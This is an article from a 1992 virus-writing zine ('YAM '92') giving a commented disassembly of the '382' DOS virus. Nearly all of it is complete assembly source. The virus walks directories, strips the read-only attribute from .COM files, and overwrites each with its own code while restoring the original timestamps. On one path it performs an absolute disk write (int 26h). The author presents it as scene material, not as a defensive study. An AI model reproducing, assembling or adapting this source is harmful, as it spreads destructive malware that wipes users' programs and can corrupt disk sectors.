ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92 Article Title: 382 Virus Author: Admiral Bailey ;=--- ; ; 382 Virus (Family-Q as McAfee 91 calls it) ; ; Disassembled By Admiral Bailey [YAM '92] ; June 25, 1992 ; ; The writer of this is unknown to me... maybe you should put some of ; your info in it. ; ; Notes:This virus I found on a board and got right to it. It wasnt ; too hard to disassemble since there was no encryption. Its an ; .com over writing virus. Yes there is ????????exe inside the ; file but I don't know what the hell that is. If you run it it ; only overwrits the com files. It probably get exe files if no ; com files are found. But anyways there seems to be a bug in ; the original virus. Put it in a directory and run it it will ; display crap and crash the computer. With out doing any ; damage. If you want any more info check it out for yourself. ; All i did this time was comment it.. cuz i found this to be a ; boring run of the mill virus. Anyways here it is. ; ;=--------- PAGE 59,132 ; I gotta check out ; what this means... data_1e equ 9Eh data_15e equ 0E000h data_17e equ 0E17Eh seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h 382 proc far start: jmp short $+2 ; just there to confuse mov cs:data_4,0 ; actually jumps to here mov ah,19h ; get default drive int 21h mov cs:data_11,al ; save default drive mov ah,47h ; get present dir of mov dl,0 ; current drive lea si,data_13 ; holds directory name int 21h clc loc_1: jnc loc_2 ; if no error then jump mov ah,17h ; rename file lea dx,data_7 ; Load effective addr int 21h cmp al,0FFh ; is there an error? jne loc_2 ; no then jump mov ah,2Ch ; get current time int 21h mov al,cs:data_11 ; drive mov bx,dx ; buffer mov cx,2 ; # of sectors mov dh,0 ; parm block int 26h ; Absolute disk write jmp loc_9 loc_2: mov ah,3Bh ; set the current lea dx,data_10 ; directory int 21h jmp short loc_6 loc_3: mov ah,17h ; rename file lea dx,data_7 int 21h mov ah,3Bh ; set current directory lea dx,data_10 int 21h mov ah,4Eh ; find first file mov cx,11h lea dx,data_6 ; file type int 21h jc loc_1 ; Jump if carry Set mov bx,cs:data_4 ; put value in bx inc bx ; check to see if it is dec bx ; zero jz loc_5 loc_4: mov ah,4Fh ; find next file int 21h jc loc_1 ; none found then jump dec bx jnz loc_4 ; Jump if not zero loc_5: mov ah,2Fh ; get dta int 21h add bx,1Ch mov word ptr es:[bx],5C20h inc bx push ds ; save ds mov ax,es ; putting es into ds mov ds,ax mov dx,bx mov ah,3Bh ; get current dir int 21h pop ds ; get old ds mov bx,cs:data_4 inc bx mov cs:data_4,bx loc_6: mov ah,4Eh ; find first file mov cx,1 lea dx,data_5 ; type to find int 21h jc loc_3 ; none found then jump jmp short loc_8 loc_7: mov ah,4Fh ; find next file int 21h jc loc_3 ; none found then jump loc_8: mov ah,3Dh ; open file mov al,0 mov dx,data_1e int 21h mov bx,ax ; file name in bx mov ah,3Fh ; read file mov cx,17Eh ; number of bytes nop mov dx,data_15e ; buffer to hold the nop ; bytes int 21h mov ah,3Eh ; close the file int 21h mov bx,cs:data_15e cmp bx,0EBh je loc_7 mov ah,43h ; get attrib mov al,0 mov dx,data_1e ; filename int 21h mov ah,43h ; set attrib mov al,1 and cx,0FEh int 21h mov ah,3Dh ; open up the file mov al,2 mov dx,data_1e ; filename int 21h mov bx,ax ; filename mov ah,57h ; get files date and mov al,0 ; time int 21h push cx ; save time push dx mov dx,word ptr cs:[23Ch] mov cs:data_17e,dx mov dx,word ptr cs:data_15e+1 lea cx,cs:[13Bh] sub dx,cx mov word ptr cs:[23Ch],dx mov ah,40h ; write to file mov cx,17Eh ; size of virus [382] nop lea dx,ds:[100h] ; Load effective addr int 21h mov ah,57h ; set files time+date mov al,1 pop dx ; get old date+time pop cx int 21h mov ah,3Eh ; close up the file int 21h mov dx,cs:data_17e mov word ptr cs:[23Ch],dx loc_9: call sub_1 jmp $-3618h db 0B4h, 4Ch,0CDh, 21h ; bytes to quit ; mov ax,4c00h ; int 21 382 endp sub_1 proc near mov ah,3Bh ; set current dir lea dx,data_12 ; holds current int 21h ; directory retn sub_1 endp data_4 dw 0 data_5 db 2Ah db 2Eh, 63h, 6Fh, 6Dh, 00h data_6 db 2Ah db 0 data_7 db 0FFh db 00h, 00h, 00h, 00h, 00h, 3Fh db 00h db 3Fh db 7 dup (3Fh) db 65h, 78h, 65h, 00h, 00h, 00h db 00h, 00h db 3Fh db 7 dup (3Fh) db 63h, 6Fh, 6Dh, 00h data_10 db 5Ch db 0 data_11 db 4 data_12 db 5Ch data_13 db 0 seg_a ends end start